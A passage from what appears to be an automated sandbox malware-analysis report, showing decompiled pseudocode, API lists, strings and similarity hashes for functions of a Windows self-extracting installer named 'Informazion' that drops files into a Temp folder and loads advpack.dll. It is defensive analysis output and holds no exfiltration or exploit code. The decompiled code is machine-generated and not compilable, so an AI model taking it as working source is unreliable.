				_v24 = 0x40;
				r9d = 0;
				E00007FF67FF64C514DCC(_t35, _t35, _t52, _t53);
				return LocalFree(??);
			}

0x7ff64c51494c
0x7ff64c51494c
0x7ff64c514956
0x7ff64c514962
0x7ff64c514975
0x7ff64c514981
0x7ff64c514987
0x7ff64c514989
0x7ff64c51498d
0x7ff64c514990
0x7ff64c514993
0x7ff64c5149a2
0x7ff64c5149a7
0x7ff64c5149a9
0x7ff64c5149b6
0x7ff64c5149bd
0x7ff64c5149bf
0x7ff64c5149c8
0x7ff64c5149cb
0x7ff64c5149d3
0x7ff64c5149ed
0x7ff64c5149ef
0x7ff64c5149f7
0x7ff64c514a04
0x7ff64c514a09
0x7ff64c514a27

APIs

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF64C513388), ref: 00007FF64C514975
LocalFree.KERNEL32(?,?,?,?,00000000,00007FF64C513388), ref: 00007FF64C514A11

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Strings

FINISHMSG, xrefs: 00007FF64C514959, 00007FF64C5149AC
@, xrefs: 00007FF64C5149F7
<None>, xrefs: 00007FF64C5149D5

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$@$FINISHMSG
API String ID: 3507850446-4126004490
Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
Instruction ID: 8875d633bdb74789fc13d93b189a3e418c6e8dbfbea91ac3dea3351c54bfc499
Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
Instruction Fuzzy Hash: 5411A476E1C24287F728BF28E41877E7E91EB85794F44A136DA6E82785DF3CD0148B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5179F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
libraryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FF67FF64C5179F0(void* __rdx, void* __r8) {
				signed int _v24;
				char _v296;
				char _t14;
				signed char _t16;
				void* _t20;
				char _t24;
				signed long long _t29;
				void* _t35;
				char* _t36;
				void* _t37;
				void* _t44;
				void* _t45;
				void* _t46;
				signed long long _t47;

				_t48 = __r8;
				_t44 = __rdx;
				_t29 =  *0x4c51c008; // 0xdeba5460e397
				_v24 = _t29 ^ _t47;
				r8d = 0x104;
				_t36 =  &_v296;
				_t4 = _t48 + 0x7ffffefa; // 0x7ffffffe
				if (_t4 == 0) goto 0x4c517a44;
				_t14 =  *((intOrPtr*)(0x4c51d610 -  &_v296 + _t36));
				_t24 = _t14;
				if (_t24 == 0) goto 0x4c517a44;
				 *_t36 = _t14;
				_t37 = _t36 + 1;
				if (_t24 != 0) goto 0x4c517a25;
				_t34 =  !=  ? _t37 : _t37 - 1;
				 *((char*)( !=  ? _t37 : _t37 - 1)) = 0;
				E00007FF67FF64C517BA8(0x104,  !=  ? _t37 : _t37 - 1, _t35,  &_v296, _t45, _t46, "advpack.dll");
				_t16 = GetFileAttributesA(??);
				if (_t16 == 0xffffffff) goto 0x4c517a96;
				if ((_t16 & 0x00000010) != 0) goto 0x4c517a96;
				_t12 = _t44 + 8; // 0x8
				r8d = _t12;
				LoadLibraryExA(??, ??, ??);
				goto 0x4c517aa9;
				return E00007FF67FF64C518470(LoadLibraryA(??), _t20, _v24 ^ _t47);
			}

0x7ff64c5179f0
0x7ff64c5179f0
0x7ff64c5179f7
0x7ff64c517a01
0x7ff64c517a1a
0x7ff64c517a20
0x7ff64c517a25
0x7ff64c517a2f
0x7ff64c517a31
0x7ff64c517a35
0x7ff64c517a37
0x7ff64c517a39
0x7ff64c517a3b
0x7ff64c517a42
0x7ff64c517a52
0x7ff64c517a5b
0x7ff64c517a5e
0x7ff64c517a68
0x7ff64c517a77
0x7ff64c517a7b
0x7ff64c517a84
0x7ff64c517a84
0x7ff64c517a88
0x7ff64c517a94
0x7ff64c517ac0

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF64C517A68
LoadLibraryExA.KERNEL32 ref: 00007FF64C517A88
LoadLibraryA.KERNEL32 ref: 00007FF64C517A9D

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C517A0E
advpack.dll, xrefs: 00007FF64C517A4B, 00007FF64C517A96

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-3680919256
Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
Instruction ID: 44065bba55a43b13acc9cc1d0aedb01afb48d9ddd66063baaf12d847f4cb3342
Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
Instruction Fuzzy Hash: 06116F31E1CA8286EA25BF18E4442FD7BA0FB89754F840233C5AD82795DF3DD629C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C511500 Relevance: 7.6, APIs: 5, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF67FF64C511500(signed int __ecx, void* __edx, void* __edi, void* __eflags, long long __rbx, void* __rcx, void* __r8, void* __r9, long long _a16) {
				signed int _v24;
				char _v536;
				signed int _t17;
				signed long long _t28;
				void* _t43;

				_t17 = __ecx;
				_a16 = __rbx;
				_t28 =  *0x4c51c008; // 0xdeba5460e397
				_v24 = _t28 ^ _t43 - 0x00000230;
				if (__eflags == 0) goto 0x4c511557;
				if (__edx - 0x110 != 1) goto 0x4c511553;
				if (__r8 + 0xfffff7c3 - 1 > 0) goto 0x4c511553;
				EndDialog(??, ??);
				goto 0x4c5115bb;
				goto 0x4c5115c0;
				GetDesktopWindow();
				E00007FF67FF64C514C68(__r8 + 0xfffff7c3 - 1, __rcx, __rcx, __r8, __r8 + 0xfffff7c3, __r9);
				r9d = 0x200;
				_v536 = 0;
				LoadStringA(??, ??, ??, ??);
				SetDlgItemTextA(??, ??, ??);
				MessageBeep(??);
				return E00007FF67FF64C518470(1, _t17 | 0xffffffff, _v24 ^ _t43 - 0x00000230);
			}

0x7ff64c511500
0x7ff64c511500
0x7ff64c51150d
0x7ff64c511517
0x7ff64c51152e
0x7ff64c511533
0x7ff64c511540
0x7ff64c511545
0x7ff64c511551
0x7ff64c511555
0x7ff64c511557
0x7ff64c511569
0x7ff64c51157a
0x7ff64c511580
0x7ff64c511587
0x7ff64c5115a0
0x7ff64c5115af
0x7ff64c5115e0

APIs

EndDialog.USER32 ref: 00007FF64C511545
GetDesktopWindow.USER32 ref: 00007FF64C511557
LoadStringA.USER32 ref: 00007FF64C511587
SetDlgItemTextA.USER32 ref: 00007FF64C5115A0
MessageBeep.USER32 ref: 00007FF64C5115AF

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
Instruction ID: 3c2a5cb2ef85fd62802ceab99d3f8bd92021cdf13708a68dd1a7bb121848b4ec
Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
Instruction Fuzzy Hash: 94118161E0CA8186EA647F18B4083BE7B60FB89B54F455232C96E47386CF3CD0558A00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C513BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF64C513BF4(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r11) {
				void* __rbp;
				signed int _t86;
				int _t100;
				short _t108;
				signed int _t112;
				intOrPtr _t116;
				int _t128;
				void* _t130;
				intOrPtr _t133;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t170;
				signed long long _t171;
				signed long long _t172;
				signed long long _t174;
				CHAR* _t190;
				void* _t193;
				signed long long _t194;
				signed long long _t196;
				void* _t203;
				void* _t204;
				struct HWND__* _t206;
				void* _t208;
				void* _t211;
				void* _t213;
				int _t216;
				struct _OSVERSIONINFOA* _t218;
				intOrPtr* _t221;

				_t204 = __r11;
				_t188 = __rsi;
				_t186 = __rdi;
				_t175 = __rbx;
				_t170 = _t193;
				 *((long long*)(_t170 + 0x10)) = __rbx;
				 *((long long*)(_t170 + 0x18)) = __rsi;
				 *((long long*)(_t170 + 0x20)) = __rdi;
				_t191 = _t170 - 0x128;
				_t194 = _t193 - 0x200;
				_t171 =  *0x4c51c008; // 0xdeba5460e397
				_t172 = _t171 ^ _t194;
				 *(_t170 - 0x128 + 0xf0) = _t172;
				_t214 = __rcx;
				 *((intOrPtr*)(_t194 + 0x40)) = 0x94;
				_t128 = GetVersionExA(_t218);
				if (_t128 != 0) goto 0x4c513c59;
				goto 0x4c513e7f;
				r14d =  *(_t194 + 0x48);
				_t116 =  *((intOrPtr*)(_t194 + 0x44));
				if (_t128 == 0) goto 0x4c513cd3;
				if ( *((intOrPtr*)(_t194 + 0x50)) - 1 == 1) goto 0x4c513c7f;
				goto 0x4c513e7f;
				 *0x4c51de78 = 2;
				 *0x4c51c1ac = 1;
				 *0x4c51c1a8 = 1;
				_t11 = _t188 + 2; // 0x3
				_t108 = _t11;
				_t130 = _t116 - _t108;
				if (_t130 > 0) goto 0x4c513cc2;
				 *0x4c51de78 = 1;
				if (_t130 < 0) goto 0x4c513cb4;
				if (_t130 != 0) goto 0x4c513cee;
				if (r14d - 0x33 >= 0) goto 0x4c513cee;
				 *0x4c51c1ac = 0;
				 *0x4c51c1a8 = 0;
				goto 0x4c513cee;
				if (_t116 - 5 < 0) goto 0x4c513cee;
				 *0x4c51de78 = _t108;
				goto 0x4c513cee;
				 *0x4c51de78 = 0;
				 *0x4c51c1ac = 1;
				 *0x4c51c1a8 = 1;
				_t133 =  *0x4c51cd14; // 0x0
				if (_t133 != 0) goto 0x4c513f34;
				if (__rcx == 0) goto 0x4c513f34;
				r15d =  *(_t194 + 0x4c) & 0x0000ffff;
				_t13 = _t214 + 0x40; // 0x40
				 *(_t194 + 0x30) = 0;
				r10d = 0;
				r11d = 0;
				asm("dec eax");
				_t208 = _t13 + (_t172 & 0xffffffc4);
				_t196 = r11d + r11d * 2;
				_t135 = _t116 -  *((intOrPtr*)(_t208 + _t196 * 8));
				if (_t135 >= 0) goto 0x4c513d38;
				goto 0x4c513d4a;
				if (_t135 <= 0) goto 0x4c513d3e;
				goto 0x4c513d4a;
				_t136 = r14d -  *((intOrPtr*)(_t208 + 4 + _t196 * 8));
				if (_t136 < 0) goto 0x4c513d34;
				_t112 = 0 | _t136 > 0x00000000;
				_t137 = _t116 -  *((intOrPtr*)(_t208 + 0xc + _t196 * 8));
				if (_t137 < 0) goto 0x4c513d63;
				if (_t137 <= 0) goto 0x4c513d57;
				goto 0x4c513d63;
				_t138 = r14d -  *((intOrPtr*)(_t208 + 0x10 + _t196 * 8));
				if (_t138 < 0) goto 0x4c513d63;
				_t86 = 0 | _t138 > 0x00000000;
				if (_t112 < 0) goto 0x4c513e17;
				if (_t86 > 0) goto 0x4c513e17;
				if (_t112 != 0) goto 0x4c513d99;
				if (_t86 != 0) goto 0x4c513d8c;
				if (r15d -  *((intOrPtr*)(_t208 + 8 + _t196 * 8)) < 0) goto 0x4c513dac;
				goto 0x4c513da6;
				if (r15d -  *((intOrPtr*)(_t208 + 8 + _t196 * 8)) >= 0) goto 0x4c513e3c;
				goto 0x4c513dac;
				if (r15d != 0) goto 0x4c513e3c;
				if (r15d -  *((intOrPtr*)(_t208 + 0x14 + _t196 * 8)) <= 0) goto 0x4c513e3c;
				if (r11d == 0) goto 0x4c513e1c;
				r14d = 0;
				if (0x54c != 0x54d) goto 0x4c513de6;
				_t174 = r10d;
				_t211 = _t174 * 0x3c + __rcx + __rdx + 0x84;
				if (_t211 == 0) goto 0x4c513ea4;
				_t47 = _t214 + 0x84; // 0x84
				_t221 = _t47 + _t174;
				if ((sil &  *(_t211 + 0x30)) == 0) goto 0x4c513e96;
				r14d = 0x104;
				goto 0x4c513ea4;
				if (r11d == 1) goto 0x4c513e33;
				_t51 = _t204 + 1; // 0x1
				r10d = _t51;
				 *(_t194 + 0x30) = r10d;
				r11d = r10d;
				if (r10d - 2 >= 0) goto 0x4c513e38;
				goto 0x4c513d24;
				if (0x54c != 0) goto 0x4c513e69;
				if ( *((intOrPtr*)(__rcx + 0x7c)) == 0) goto 0x4c513f34;
				_t179 = __rcx;
				if (E00007FF67FF64C512834( *((intOrPtr*)(__rcx + 0x80)), _t174, __rcx, _t170 - 0x108, _t194 + 0x30) != 0) goto 0x4c513f34;
				r10d =  *(_t194 + 0x30);
				_t57 = _t186 - 0x54c; // 0x1
				if (_t57 - 1 <= 0) goto 0x4c513db6;
				if (0x54d == 0) goto 0x4c513f36;
				r9d = 0;
				 *((intOrPtr*)(_t194 + 0x28)) = 0;
				r8d = 0;
				 *((intOrPtr*)(_t194 + 0x20)) = 0x10;
				goto 0x4c513f2b;
				asm("inc ebp");
				r14d = r14d & 0x00000101;
				if (( *0x4c51cd18 & sil) != 0) goto 0x4c513f17;
				if (_t221 == 0) goto 0x4c513f17;
				if ( *_t221 == 0) goto 0x4c513f17;
				MessageBeep(_t216);
				if (E00007FF67FF64C517F04(__rbx, __rdi, __rsi, _t196) == 0) goto 0x4c513edc;
				if (E00007FF67FF64C517E34(_t175, _t191, _t213) != 0) goto 0x4c513ee1;
				r9d = 0x00000030 | r14d;
				_t100 = MessageBoxA(_t206, _t190);
				if ((r14b & 0x00000004) == 0) goto 0x4c513f0a;
				goto 0x4c513f11;
				if ((sil & r14b) == 0) goto 0x4c513f34;
				if (_t100 != 1) goto 0x4c513f34;
				goto 0x4c513f34;
				 *((intOrPtr*)(_t194 + 0x28)) = 0;
				 *((intOrPtr*)(_t194 + 0x20)) = 0x30;
				E00007FF67FF64C514DCC(_t179, 0x4c51d578, _t194 + 0x30, _t203);
				return E00007FF67FF64C518470(0xbadbad, 0,  *(_t191 + 0xf0) ^ _t194);
			}

0x7ff64c513bf4
0x7ff64c513bf4
0x7ff64c513bf4
0x7ff64c513bf4
0x7ff64c513bf4
0x7ff64c513bf7
0x7ff64c513bfb
0x7ff64c513bff
0x7ff64c513c0c
0x7ff64c513c13
0x7ff64c513c1a
0x7ff64c513c21
0x7ff64c513c24
0x7ff64c513c2b
0x7ff64c513c2e
0x7ff64c513c4b
0x7ff64c513c4d
0x7ff64c513c54
0x7ff64c513c62
0x7ff64c513c67
0x7ff64c513c6e
0x7ff64c513c73
0x7ff64c513c7a
0x7ff64c513c84
0x7ff64c513c8e
0x7ff64c513c94
0x7ff64c513c9a
0x7ff64c513c9a
0x7ff64c513c9d
0x7ff64c513c9f
0x7ff64c513ca3
0x7ff64c513caa
0x7ff64c513cac
0x7ff64c513cb2
0x7ff64c513cb4
0x7ff64c513cba
0x7ff64c513cc0
0x7ff64c513cc5
0x7ff64c513cca
0x7ff64c513cd1
0x7ff64c513cd8
0x7ff64c513cdf
0x7ff64c513ce8
0x7ff64c513cee
0x7ff64c513cf4
0x7ff64c513cfd
0x7ff64c513d03
0x7ff64c513d09
0x7ff64c513d10
0x7ff64c513d14
0x7ff64c513d17
0x7ff64c513d1a
0x7ff64c513d21
0x7ff64c513d2a
0x7ff64c513d2e
0x7ff64c513d32
0x7ff64c513d36
0x7ff64c513d38
0x7ff64c513d3c
0x7ff64c513d3e
0x7ff64c513d43
0x7ff64c513d47
0x7ff64c513d4a
0x7ff64c513d4f
0x7ff64c513d51
0x7ff64c513d55
0x7ff64c513d57
0x7ff64c513d5c
0x7ff64c513d60
0x7ff64c513d65
0x7ff64c513d6d
0x7ff64c513d75
0x7ff64c513d79
0x7ff64c513d83
0x7ff64c513d8a
0x7ff64c513d91
0x7ff64c513d97
0x7ff64c513d9b
0x7ff64c513da6
0x7ff64c513daf
0x7ff64c513dbc
0x7ff64c513dc5
0x7ff64c513dd2
0x7ff64c513de3
0x7ff64c513de9
0x7ff64c513df4
0x7ff64c513dfb
0x7ff64c513e06
0x7ff64c513e0c
0x7ff64c513e12
0x7ff64c513e1a
0x7ff64c513e1c
0x7ff64c513e1c
0x7ff64c513e20
0x7ff64c513e25
0x7ff64c513e2c
0x7ff64c513e2e
0x7ff64c513e3a
0x7ff64c513e40
0x7ff64c513e4b
0x7ff64c513e59
0x7ff64c513e5f
0x7ff64c513e69
0x7ff64c513e71
0x7ff64c513e79
0x7ff64c513e7f
0x7ff64c513e82
0x7ff64c513e86
0x7ff64c513e89
0x7ff64c513e91
0x7ff64c513e9a
0x7ff64c513e9d
0x7ff64c513eab
0x7ff64c513eb0
0x7ff64c513eb5
0x7ff64c513eb9
0x7ff64c513ecc
0x7ff64c513eda
0x7ff64c513eeb
0x7ff64c513ef3
0x7ff64c513f03
0x7ff64c513f08
0x7ff64c513f0d
0x7ff64c513f11
0x7ff64c513f15
0x7ff64c513f1c
0x7ff64c513f20
0x7ff64c513f2f
0x7ff64c513f6a

APIs

GetVersionExA.KERNEL32 ref: 00007FF64C513C3F
MessageBeep.USER32 ref: 00007FF64C513EB9

Part of subcall function 00007FF64C517F04: GetVersionExA.KERNEL32 ref: 00007FF64C517F59
Part of subcall function 00007FF64C517F04: GetSystemMetrics.USER32 ref: 00007FF64C517F93
Part of subcall function 00007FF64C517F04: RegOpenKeyExA.ADVAPI32 ref: 00007FF64C517FC8
Part of subcall function 00007FF64C517F04: RegQueryValueExA.ADVAPI32 ref: 00007FF64C518003
Part of subcall function 00007FF64C517F04: RegCloseKey.ADVAPI32 ref: 00007FF64C518016
Part of subcall function 00007FF64C517F04: CharNextA.USER32 ref: 00007FF64C518065

MessageBoxA.USER32 ref: 00007FF64C513EF3

Part of subcall function 00007FF64C517E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF64C517E8C
Part of subcall function 00007FF64C517E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF64C517ECA

Strings

Maintal, xrefs: 00007FF64C513EE4, 00007FF64C513F24

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
String ID: Maintal
API String ID: 2312377310-1608070445
Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
Instruction ID: db4caa9821ef036dcfd9a6458e76e507f6ce5768cca04e91995a4e771715f028
Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
Instruction Fuzzy Hash: 7BA18C36E1D24286FB68BF19946867D6EA4BF44794F110137E9ADC3380CE3DE864CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5178B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
fileCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00007FF67FF64C5178B0(void* __ecx, long long __rbx, void* __r9, long long _a16) {
				signed int _v40;
				char _v312;
				signed int _v328;
				signed long long _v344;
				intOrPtr _v352;
				signed long long _v360;
				void* __rsi;
				void* __rbp;
				char _t22;
				char _t37;
				signed long long _t43;
				char* _t48;
				char* _t59;
				void* _t63;
				void* _t65;
				void* _t68;

				_a16 = __rbx;
				_t43 =  *0x4c51c008; // 0xdeba5460e397
				_v40 = _t43 ^ _t65 - 0x00000170;
				_v328 = _v328 & 0x00000000;
				_t59 =  &_v312;
				r10d = 0x104;
				r9d = r10d;
				if (__r9 + 0x7ffffefa == 0) goto 0x4c51791a;
				_t22 =  *((intOrPtr*)(0x4c51d610 -  &_v312 + _t59));
				_t37 = _t22;
				if (_t37 == 0) goto 0x4c51791a;
				 *_t59 = _t22;
				_t60 = _t59 + __rbx;
				if (_t37 != 0) goto 0x4c5178fd;
				_t9 = _t60 - 1; // 0x103
				_t48 =  !=  ? _t59 + __rbx : _t9;
				 *_t48 = 0;
				E00007FF67FF64C517BA8(r10d, _t48, __rbx,  &_v312, _t63, __r9, _t68);
				_v344 = _v344 & 0x00000000;
				_v352 = 0x80;
				r9d = 0;
				r8d = 0;
				_v360 = 2;
				CreateFileA(??, ??, ??, ??, ??, ??, ??);
				if (_t48 != 0xffffffff) goto 0x4c51797e;
				 *0x4c51d544 = 0x80070052;
				goto 0x4c5179c3;
				_v360 = _v360 & 0x00000000;
				r8d = __ecx;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x4c5179a8;
				if (__ecx == _v328) goto 0x4c5179b4;
				 *0x4c51d544 = 0x80070052;
				CloseHandle(??);
				return E00007FF67FF64C518470(0, __ecx, _v40 ^ _t65 - 0x00000170);
			}

0x7ff64c5178b0
0x7ff64c5178bf
0x7ff64c5178c9
0x7ff64c5178d1
0x7ff64c5178dd
0x7ff64c5178e9
0x7ff64c5178fa
0x7ff64c517907
0x7ff64c517909
0x7ff64c51790c
0x7ff64c51790e
0x7ff64c517910
0x7ff64c517912
0x7ff64c517918
0x7ff64c51791a
0x7ff64c517926
0x7ff64c51792d
0x7ff64c517930
0x7ff64c517935
0x7ff64c517940
0x7ff64c517948
0x7ff64c51794b
0x7ff64c51794e
0x7ff64c51795b
0x7ff64c51796e
0x7ff64c517970
0x7ff64c51797c
0x7ff64c51797e
0x7ff64c517989
0x7ff64c5179a0
0x7ff64c5179a6
0x7ff64c5179a8
0x7ff64c5179b7
0x7ff64c5179e7

APIs

CreateFileA.KERNEL32 ref: 00007FF64C51795B
WriteFile.KERNEL32 ref: 00007FF64C517992
CloseHandle.KERNEL32 ref: 00007FF64C5179B7

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C5178E2

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-305352358
Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
Instruction ID: 33cb268aa108af616b6d575cfea9ae5fc43aad54794f2c03c800db4845ec798d
Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
Instruction Fuzzy Hash: EB31A532A0C68186EB15BF18E4487BDBB60FB897A4F444236DAAD87795DF7CD518CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C518470 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF67FF64C518470(void* __eax, signed int __ecx, void* __rcx) {
				void* _t4;

				_t4 = __rcx -  *0x4c51c008; // 0xdeba5460e397
				if (_t4 != 0) goto 0x4c518489;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0x4c518485;
				return __eax;
			}

0x7ff64c518470
0x7ff64c518477
0x7ff64c518479
0x7ff64c518482
0x7ff64c518484

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF64C5184E3
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF64C518502
RtlVirtualUnwind.KERNEL32 ref: 00007FF64C51854F
__raise_securityfailure.LIBCMT ref: 00007FF64C518634

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
Instruction ID: ed29ac920cac09ae22c8b5314229ccf3b53277c2c8321590299850b4d4170c38
Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
Instruction Fuzzy Hash: 0841C235E0CB4185EA18BF5DF8983696BB4FB89784F904136D9AD82764DF7EE064C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C517AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF64C517AF2
LoadResource.KERNEL32 ref: 00007FF64C517B09
DialogBoxIndirectParamA.USER32 ref: 00007FF64C517B3F
FreeResource.KERNEL32 ref: 00007FF64C517B51

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
